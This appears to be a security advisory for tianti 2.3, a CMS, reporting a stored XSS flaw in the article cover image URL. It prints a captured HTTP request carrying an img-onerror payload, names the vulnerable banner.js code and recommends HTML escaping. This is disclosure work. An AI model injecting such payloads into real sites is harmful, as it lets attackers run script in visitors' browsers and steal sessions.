tianti 2.3 has stroed XSS on the homepage

[KaGty1]

Affected version

tianti 2.3 (latest)

Vulnerability description

When publishing an article, replacing the cover image URL with XSS attack POC can launch XSS attacks on all users accessing the homepage, executing arbitrary malicious code on the front-end.

Vulnerability proof

Firstly, Click "add article"

then click 'Save' and use Burpsuite to capture the package

The contents of the data packet are as follows:

POST /tianti-module-admin/cms/article/ajax/save HTTP/1.1
Host: localhost:8788
Content-Length: 175
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://localhost:8788
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8788/tianti-module-admin/cms/article/edit?id=&rootColumnId=4028821e5b7a0971015b7a0a1cbf0000&columnId=
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=C3CECD5A2F0AB3FACCB8ABF51ED69EFC; Idea-de19657=aa310384-4713-4a24-b305-e8293e29c9bd
Connection: close

id=&coverImageUrl="><img+src=1+onerror=alert("document.cookie")>&rootColumnId=4028821e5b7a0971015b7a0a1cbf0000&leafColumnId=4028abdf9491287b019491f101e2000b&articleType=contentType&title=test&href=&publisher=test&orderNo=

Fill the parameter value of coverImageURL into our XSS attack POC -> "><img src=1 onerror=alert(1)>

After releasing the package, accessing the front-end homepage of Tianti website was attacked by XSS：

Code analysis

In ~/tianti-2.3/tianti-modules/tianti-module-gateway/src/main/webapp/static/template/banner.js:

Directly concatenate the attack POC into HTML without any processing

Repair suggestions

HTML escape of data input by users and used for display